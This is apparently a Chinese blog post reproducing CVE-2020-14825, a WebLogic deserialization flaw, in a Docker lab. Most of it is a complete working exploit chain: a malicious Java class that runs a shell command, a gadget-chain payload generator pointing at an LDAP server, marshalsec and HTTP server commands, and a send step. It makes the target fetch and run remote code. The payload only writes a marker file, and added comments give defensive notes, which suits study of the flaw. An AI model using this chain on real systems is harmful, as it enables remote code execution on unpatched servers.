CVE-2020-14825:Weblogic反序列化漏洞復現
阿新 • • 發佈:2020-10-29
環境
docker pull ismaleiva90/weblogic12
docker images
docker run -p7001:7001 84795663769d
POC
/**
 * Class that the vulnerable server ends up loading through the JNDI/LDAP reference
 * ("ldap://...:1389/#exp", served via marshalsec on this page). Its constructor runs on
 * instantiation, so the command below executes on the WebLogic host; the "ls /tmp" at
 * the end of the page shows the resulting marker file.
 *
 * Defender note: remote class loading through JNDI is the impact step of this chain.
 * Patched WebLogic (Oracle CPU October 2020 for CVE-2020-14825), restricted T3/IIOP
 * exposure and blocked outbound LDAP/HTTP from the application server each break it.
 */
public class exp {
    // POC open calc (original author's note) -- the action here only writes a marker file.
    public exp() {
        try {
            // Marker used as proof of execution; its presence in /tmp is the success check below.
            Runtime.getRuntime().exec("touch /tmp/ok14825.txt");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    // Local entry point: instantiating the class is enough to run the constructor.
    public static void main(String[] argv) {
        exp e = new exp();
    }
}
找這些jar包真費勁
import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import ysoserial.payloads.util.Reflections;
import java.io.*;
import java.util.PriorityQueue;

/**
 * Builds the serialized payload file (cve_2020_14825.ser) used on this page.
 *
 * What the object graph looks like (all visible below): a PriorityQueue whose comparator
 * is a Coherence ExtractorComparator wrapping an EclipseLink LockVersionExtractor, whose
 * accessor is configured to call "getDatabaseMetaData" on the queued element, a
 * JdbcRowSetImpl whose data-source name is an LDAP URL. When the queue is deserialized,
 * the comparator is applied to the elements, so the getter runs and the row set resolves
 * its data-source name through JNDI -- reaching the attacker-controlled LDAP server.
 *
 * Defender notes:
 *  - The vulnerable sink is deserialization of attacker-supplied data on the WebLogic
 *    T3/IIOP listener; Oracle's October 2020 Critical Patch Update addresses CVE-2020-14825.
 *  - Detection hints grounded in this file: a serialized PriorityQueue carrying
 *    com.tangosol/org.eclipse.persistence classes arriving on port 7001, and an application
 *    server initiating outbound LDAP connections (the ldap:// URL below) shortly afterwards.
 *  - The classes used come from the server's own Coherence/EclipseLink jars (hence the
 *    author's remark about hunting for jars); JEP 290 style deserialization filters that
 *    reject these types, plus egress filtering, are the standard mitigations.
 */
public class CVE_2020_14825 {
    public static void main(String[] args) throws Exception {
        // Accessor configured so that "reading" the attribute invokes getDatabaseMetaData
        // on whatever object the extractor is handed.
        MethodAttributeAccessor accessor = new MethodAttributeAccessor();
        accessor.setAttributeName("Timeline Sec");
        accessor.setIsWriteOnly(true);
        accessor.setGetMethodName("getDatabaseMetaData");
        LockVersionExtractor extractor = new LockVersionExtractor(accessor,"");
        // Created reflectively (no constructor run); only the data-source name matters here.
        // NOTE: the LDAP host/port below is the author's lab listener (see the marshalsec
        // command on this page); it is what the server will connect out to.
        JdbcRowSetImpl jdbcRowSet = Reflections.createWithoutConstructor(com.sun.rowset.JdbcRowSetImpl.class);
        jdbcRowSet.setDataSourceName("ldap://192.168.8.142:1389/#exp");
        // Queue with the extractor-backed comparator; size is forced to 2 via reflection so
        // that readObject() performs a comparison involving the planted element.
        PriorityQueue<Object> queue = new PriorityQueue(2, new ExtractorComparator(extractor));
        Reflections.setFieldValue(queue,"size",2);
        Object[] queueArray = (Object[])((Object[]) Reflections.getFieldValue(queue, "queue"));
        queueArray[0] = jdbcRowSet;
        // Serialize to disk; the stream is closed manually rather than with try-with-resources.
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(new File("cve_2020_14825.ser")));
        out.writeObject(queue);
        out.flush();
        out.close();
        // Left disabled: deserializing the file locally would trigger the same JNDI lookup
        // from the generating JVM (presumably why the author commented it out).
        // readObject();
    }

    /**
     * Local self-test helper: deserializes cve_2020_14825.ser in this JVM. Not called from
     * main(); the input stream is never closed on the success path.
     */
    public static void readObject() {
        FileInputStream fis = null;
        try {
            fis = new FileInputStream("cve_2020_14825.ser");
            ObjectInputStream ois = new ObjectInputStream(fis);
            ois.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
過程
編譯exp.java
放在 python -m SimpleHTTPServer 80 下
開啟 ldap 服務
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.8.142/#exp 1389
go
python weblogic_poc.py -u 192.168.8.142 -p 7001 -f cve_2020_14825.ser
結果
docker exec -i -t 84795663769d /bin/bash
[oracle@c6836c2a0308 base_domain]$ ls /tmp
hsperfdata_oracle ok14825.txt wlstTemporacle